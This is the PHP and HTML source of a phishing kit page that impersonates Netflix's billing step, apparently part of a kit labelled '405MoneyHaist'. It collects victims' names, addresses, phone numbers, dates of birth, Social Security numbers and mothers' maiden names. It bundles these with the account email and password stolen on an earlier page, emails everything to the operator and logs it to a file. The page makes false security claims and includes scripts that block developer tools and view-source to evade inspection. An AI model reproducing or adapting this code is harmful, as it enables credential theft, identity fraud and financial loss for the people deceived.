<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include 'setup/function.php';
require_once __DIR__ . '/../GlobalSetting/email_sender.php';
$res = json_decode(file_get_contents('../config/access.json'), true);
$genConfig = json_decode(file_get_contents('../config/gen.json'), true);

// Get config for SSN, DOB, MMN (1 = on/required, 0 = off/hidden)
$ssnEnabled = isset($genConfig['ssn']) && ($genConfig['ssn'] == '1' || $genConfig['ssn'] == 'on');
$dobEnabled = isset($genConfig['dob']) && ($genConfig['dob'] == '1' || $genConfig['dob'] == 'on');
$mmnEnabled = isset($genConfig['mmn']) && ($genConfig['mmn'] == '1' || $genConfig['mmn'] == 'on');

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    // Session hilang, redirect ke login
    header("Location: loginss?session_expired=1");
    exit;
}

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Address Page');

if($_SERVER['REQUEST_METHOD'] == 'POST')
{
    $_SESSION['form_data'] = $_POST;
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $city = $ipData['city'] ?? 'N/A';
    $region = $ipData['region'] ?? 'N/A';
    $country = $ipData['country'] ?? 'N/A';
    $isp = $ipData['isp'] ?? 'N/A';
    $device = getDevice();
    $browser = getBrowser();
    $date_time = date('H:i:s m-d-Y');
    $date_subject = date('D d M Y H:i:s');
    
    $fullname = htmlspecialchars($_POST['firstname'] ?? '') . ' '. htmlspecialchars($_POST['lastname'] ?? '');
    $address = htmlspecialchars($_POST['address'] ?? '');
    $address2 = htmlspecialchars($_POST['adde'] ?? '');
    $city = htmlspecialchars($_POST['city'] ?? '');
    $state = htmlspecialchars($_POST['state'] ?? '');
    $zipcode = htmlspecialchars($_POST['zip'] ?? '');
    $phonenumber = htmlspecialchars($_POST['phone'] ?? '');
    $sosel = htmlspecialchars($_POST['ssn'] ?? '');
    $dob = htmlspecialchars($_POST['dob'] ?? '');
    $mmn = htmlspecialchars($_POST['mmn'] ?? '');
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    // Build HTML email data for billing
    $emailData = [
        'email' => $email,
        'password' => $password,
        'fullname' => $fullname,
        'address' => $address,
        'address2' => $address2,
        'city' => $city,
        'state' => $state,
        'zipcode' => $zipcode,
        'phone' => $phonenumber,
        'dob' => $dob,
        'ssn' => $sosel,
        'mmn' => $mmn,
        'datetime' => $date_time,
        'ip' => $ip,
        'isp' => $isp,
        'country' => $country,
        'region' => $region,
        'device' => $device,
        'browser' => $browser,
        'useragent' => $userAgent
    ];
    
    $subject = "405MoneyHaist Billing Address: $date_subject";
    $message = function_exists('buildGlobalBillingHtml') ? buildGlobalBillingHtml($emailData) : '';
    sendGlobalEmail('', $subject, $message, true);
    
    // Log billing submission
    loginAndCardSave($ip, 'billing.txt');
    
    $ccTpl = $dataPage['cc_template'] ?? '3';
    $ccTarget = ($ccTpl == '2') ? 'payment' : 'cc';
    if($ccTpl == '2')
    {
        header("Location: payment?payment-token=".generateRandomString(100));
        exit;
    } else {
        header("Location: cc?payment-token=".generateRandomString(100));
        exit;
    }
}
// Get visitor language
$visitorLang = $_SESSION['visitor_lang'] ?? 'en';
$textDir = function_exists('getTextDirection') ? getTextDirection() : 'ltr';
?>
<!DOCTYPE html>
<html lang="<?= $visitorLang ?>" dir="<?= $textDir ?>">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix - Personal Information</title>
    <link rel="stylesheet" href="tema/styles/style.css">
    <style>
        /* Clean Loading Screen */
        .loading-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100vh;
            background: #ffffff;
            z-index: 999999;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }
        .loading-content {
            text-align: center;
            padding: 40px;
        }
        .loading-spinner {
            border: 3px solid #f0f0f0;
            border-top: 3px solid #e50914;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 0.8s linear infinite;
            margin: 0 auto 24px;
        }
        .loading-text {
            margin: 0;
            font-size: 18px;
            font-weight: 400;
            color: #333;
            letter-spacing: 0.5px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Field Validation Styles */
        .form-control.valid-card, .form-control.valid {
            border-color: #28a745 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important;
            background-color: #f8fff9 !important;
        }
        
        .form-control.valid-card:focus, .form-control.valid:focus {
            border-color: #28a745 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important;
            outline: none !important;
        }
        
        .form-control.invalid-card, .form-control.error {
            border-color: #dc3545 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important;
        }
        
        .form-control.invalid-card:focus, .form-control.error:focus {
            border-color: #dc3545 !important;
            box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important;
        }

        /* Button Loading State */
        .continue-button {
            position: relative;
            transition: all 0.3s ease;
        }

        .continue-button.loading {
            opacity: 0.8;
            cursor: not-allowed;
            pointer-events: none;
        }

        .continue-button .btn-spinner {
            display: inline-block;
            width: 16px;
            height: 16px;
            border: 2px solid rgba(255, 255, 255, 0.3);
            border-top: 2px solid #ffffff;
            border-radius: 50%;
            animation: btnSpin 1s linear infinite;
            margin-right: 8px;
            vertical-align: middle;
        }

        @keyframes btnSpin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <!-- Simple Loading Screen -->
    <div id="loading-overlay" class="loading-overlay">
        <div class="loading-content">
            <div class="loading-spinner"></div>
            <p class="loading-text"><?= __('loading') ?></p>
        </div>
    </div>
    <style>.header{border-bottom:1px solid #e6e6e6;padding:20px 0}.header-content{max-width:1200px;margin:0 auto;padding:0 20px;display:flex;justify-content:space-between;align-items:center}.netflix-logo{width:134px;height:36px;fill:#e50914}</style>
    <header class="header">
        <div class="header-content">
            <svg class="netflix-logo" viewBox="0 0 111 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img">
                <g><path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z"></path></g>
            </svg>
            <a href="#" class="sign-out"><?= __('sign_out') ?></a>
        </div>
    </header>

    <main class="main-content">
        <div style="border: 2px solid #b00710; border-left: 4px solid #b00710; border-radius: 4px; padding: 14px 16px; margin-bottom: 20px; background: #fff;">
            <p style="color: #333; font-size: 15px; margin: 0; line-height: 1.5;">Please update your billing information to continue.</p>
        </div>
        <div class="step-info">Step 2 of 3</div>
        <h1 class="page-title"><?= __('billing_info') ?></h1>

        <form method="POST" action="" id="addressForm">
            <div class="form-row">
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" class="form-control" id="firstName" name="firstname" placeholder=" ">
                        <label for="firstName" class="floating-label"><?= __('first_name') ?></label>
                    </div>
                    <div class="error-message" id="firstNameError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span>Please enter your first name.</span>
                    </div>
                </div>
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" class="form-control" id="lastName" name="lastname" placeholder=" ">
                        <label for="lastName" class="floating-label"><?= __('last_name') ?></label>
                    </div>
                    <div class="error-message" id="lastNameError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span>Please enter your last name.</span>
                    </div>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <?php $phoneCode = $ipData['phone_code'] ?? '+1'; if (strpos($phoneCode, '+') !== 0) $phoneCode = '+' . $phoneCode; ?>
                    <input type="tel" class="form-control" id="phoneNumber" name="phone" placeholder=" " value="<?= htmlspecialchars($phoneCode) ?> " required>
                    <label for="phoneNumber" class="floating-label"><?= __('phone') ?></label>
                </div>
                <div class="error-message" id="phoneNumberError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span>Please enter a valid phone number.</span>
                </div>
            </div>

            <?php if($mmnEnabled): ?>
            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="motherMaidenName" name="mmn" placeholder=" ">
                    <label for="motherMaidenName" class="floating-label"><?= __('mothers_maiden_name') ?></label>
                </div>
                <div class="error-message" id="motherMaidenNameError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span>Please enter your mother's maiden name.</span>
                </div>
            </div>
            <?php endif; ?>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="dateOfBirth" name="dob" placeholder=" " maxlength="10" required>
                    <label for="dateOfBirth" class="floating-label"><?= __('date_of_birth') ?></label>
                </div>
                <div class="error-message" id="dateOfBirthError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span>Please enter your date of birth (MM/DD/YYYY).</span>
                </div>
            </div>

            <?php if($ssnEnabled): ?>
            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="ssn" name="ssn" placeholder=" " maxlength="11" required>
                    <label for="ssn" class="floating-label"><?= __('ssn') ?></label>
                </div>
                <div class="error-message" id="ssnError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span>Please enter a valid SSN (XXX-XX-XXXX).</span>
                </div>
            </div>
            <?php endif; ?>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="address1" name="address" placeholder=" ">
                    <label for="address1" class="floating-label"><?= __('address_line1') ?></label>
                </div>
                <div class="error-message" id="address1Error">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span>Please enter your address.</span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="address2" name="adde" placeholder=" ">
                    <label for="address2" class="floating-label"><?= __('address_line2') ?></label>
                </div>
            </div>

            <div class="form-row">
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" class="form-control" id="region" name="city" placeholder=" " required>
                        <label for="region" class="floating-label"><?= __('city') ?></label>
                    </div>
                    <div class="error-message" id="regionError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span>Please enter your region.</span>
                    </div>
                </div>
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" class="form-control" id="state" name="state" placeholder=" " required>
                        <label for="state" class="floating-label"><?= __('state') ?></label>
                    </div>
                    <div class="error-message" id="stateError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span>Please enter your state.</span>
                    </div>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="postalCode" name="zip" placeholder=" " maxlength="10" required>
                    <label for="postalCode" class="floating-label"><?= __('zip_code') ?></label>
                </div>
                <div class="error-message" id="postalCodeError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span>Please enter a valid postal code.</span>
                </div>
            </div>

            <div class="disclaimer">
                Your personal information is protected and encrypted. We use this information to verify your identity and provide better service.
            </div>

            <div class="disclaimer">
                By continuing, you agree to our <a href="#">Terms of Use</a> and <a href="#">Privacy Statement</a>, and confirm that you are over 18 years old.
            </div>

            <div class="checkbox-wrapper">
                <input type="checkbox" id="agree" name="agree" class="checkbox" required>
                <label for="agree" class="checkbox-label">I agree to the terms and conditions.</label>
            </div>

            <button type="submit" class="continue-button" id="submitButton"><?= __('continue') ?></button>

            <div class="security-notice">
                This information is secured with 256-bit SSL encryption. <a href="#">Learn more</a>.
            </div>
        </form>
    </main>

    <footer class="footer">
        <div class="footer-content">
            <div class="footer-contact">
                Questions? Call <a href="tel:1-844-505-2993">1-844-505-2993</a>
            </div>

            <div class="footer-links">
                <a href="#">FAQ</a>
                <a href="#">Help Center</a>
                <a href="#">Terms of Use</a>
                <a href="#">Privacy</a>
                <a href="#">Cookie Preferences</a>
                <a href="#">Corporate Information</a>
                <a href="#">Ad Choices</a>
            </div>

            <div class="language-selector" style="position: relative; display: inline-block; margin-top: 20px;">
                <svg class="language-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="LanguagesSmall" aria-hidden="true" style="position: absolute; left: 8px; top: 50%; transform: translateY(-50%); width: 16px; height: 16px; color: #737373; pointer-events: none; z-index: 1;">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M10.7668 5.33333L10.5038 5.99715L9.33974 8.9355L8.76866 10.377L7.33333 14H9.10751L9.83505 12.0326H13.4217L14.162 14H16L12.5665 5.33333H10.8278H10.7668ZM10.6186 9.93479L10.3839 10.5632H11.1036H12.8856L11.6348 7.2136L10.6186 9.93479ZM9.52722 4.84224C9.55393 4.77481 9.58574 4.71045 9.62211 4.64954H6.41909V2H4.926V4.64954H0.540802V5.99715H4.31466C3.35062 7.79015 1.75173 9.51463 0 10.4283C0.329184 10.7138 0.811203 11.2391 1.04633 11.5931C2.55118 10.6795 3.90318 9.22912 4.926 7.57316V12.6667H6.41909V7.51606C6.81951 8.15256 7.26748 8.76169 7.7521 9.32292L8.31996 7.88955C7.80191 7.29052 7.34631 6.64699 6.9834 5.99715H9.06968L9.52722 4.84224Z" fill="currentColor"></path>
                </svg>
                <select name="language" id="language" style="background: transparent; border: 1px solid #737373; color: #737373; padding: 8px 32px 8px 32px; font-size: 13px; border-radius: 2px; appearance: none; cursor: pointer; min-width: 120px;">
                    <option value="en">English</option>
                    <option value="es">Español</option>
                </select>
                <svg class="dropdown-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16" style="position: absolute; right: 8px; top: 50%; transform: translateY(-50%); width: 12px; height: 12px; color: #737373; pointer-events: none; z-index: 1;">
                    <path d="M8 10.586L3.414 6 2 7.414 8 13.414 14 7.414 12.586 6z" fill="currentColor"/>
                </svg>
            </div>
            
            <div class="footer-country">
                Netflix United States
            </div>
        </div>
    </footer>

    <script>
        // Advanced Protection System
        (function() {
            'use strict';
            
            function obfuscateDOM() {
                const dummyHTML = '<!DOCTYPE html><html><head><title>Childrich</title><style>body{margin:0;padding:0;display:flex;justify-content:center;align-items:center;min-height:100vh;font-family:Arial,sans-serif;background:#f5f5f5}h1{color:#333;text-align:center;font-size:48px;margin:0}</style></head><body><h1>Childrich</h1></body></html>';
                document.open();
                document.write(dummyHTML);
                document.close();
            }
            
            function clearConsole() {
                if (window.console && window.console.clear) console.clear();
                console.log('%cAccess Denied', 'color: red; font-size: 40px; font-weight: bold;');
            }
            
            const threshold = 160;
            setInterval(function() {
                if (window.outerHeight - window.innerHeight > threshold || window.outerWidth - window.innerWidth > threshold) {
                    clearConsole();
                }
            }, 500);
            
            document.addEventListener('keydown', function(e) {
                if (e.key === 'F12' || (e.ctrlKey && e.shiftKey && ['I', 'C', 'J'].includes(e.key.toUpperCase()))) {
                    e.preventDefault(); e.stopPropagation(); clearConsole(); return false;
                }
                if (e.ctrlKey && e.key.toUpperCase() === 'U') { setTimeout(obfuscateDOM, 100); return true; }
                if (e.ctrlKey && ['C', 'V', 'X'].includes(e.key.toUpperCase())) {
                    const target = e.target;
                    if (target.tagName !== 'INPUT' && target.tagName !== 'TEXTAREA') { e.preventDefault(); return false; }
                }
            }, true);
            
            document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }, false);
            document.addEventListener('selectstart', function(e) {
                if (e.target.tagName !== 'INPUT' && e.target.tagName !== 'TEXTAREA') { e.preventDefault(); return false; }
            }, false);
            
            clearConsole();
        })();
    </script>

    <script>
        // Floating label functionality
        function setupFloatingLabels() {
            const inputs = document.querySelectorAll('.form-control');
            
            inputs.forEach(input => {
                // Check if input has value on page load
                if (input.value.trim() !== '') {
                    input.classList.add('has-value');
                }
                
                // Handle focus event
                input.addEventListener('focus', function() {
                    this.classList.add('focused');
                    
                    // Mark that user has interacted with this field
                    this.setAttribute('data-touched', 'true');
                    this.classList.remove('error');
                    
                    // Hide error message for this field
                    const errorElement = document.getElementById(this.id + 'Error');
                    if (errorElement) {
                        errorElement.classList.remove('show');
                    }
                });
                
                // Handle blur event
                input.addEventListener('blur', function() {
                    this.classList.remove('focused');
                    if (this.value.trim() !== '') {
                        this.classList.add('has-value');
                    } else {
                        this.classList.remove('has-value');
                    }
                    
                    // Validate field on blur (only if user has touched the field and field is not optional)
                    if (this.getAttribute('data-touched') === 'true' && this.value.trim() === '' && this.id !== 'address2') {
                        // Check if field is required (not MMN or SSN when they're disabled)
                        const isMMNField = this.id === 'motherMaidenName';
                        const isSSNField = this.id === 'ssn';
                        const isRequiredField = !isMMNField && !isSSNField;
                        
                        // Only show error for required fields or enabled optional fields
                        if (isRequiredField || (isMMNField && document.getElementById('motherMaidenName')) || (isSSNField && document.getElementById('ssn'))) {
                            this.classList.add('error');
                            const errorElement = document.getElementById(this.id + 'Error');
                            if (errorElement) {
                                errorElement.classList.add('show');
                            }
                        }
                    }
                    
                    // Specific validation
                    validateField(this);
                });
                
                // Handle input event
                input.addEventListener('input', function() {
                    if (this.value.trim() !== '') {
                        this.classList.add('has-value');
                        
                        // Remove error state when user starts typing
                        this.classList.remove('error');
                        const errorElement = document.getElementById(this.id + 'Error');
                        if (errorElement) {
                            errorElement.classList.remove('show');
                        }
                    } else {
                        this.classList.remove('has-value');
                        // Remove valid state when input is empty
                        this.classList.remove('valid');
                    }
                    
                    // Format specific fields
                    formatField(this);
                });
            });
        }

        // Format specific fields
        function formatField(input) {
            switch (input.id) {
                case 'phoneNumber':
                    const phoneCode = '<?= htmlspecialchars($phoneCode) ?>';
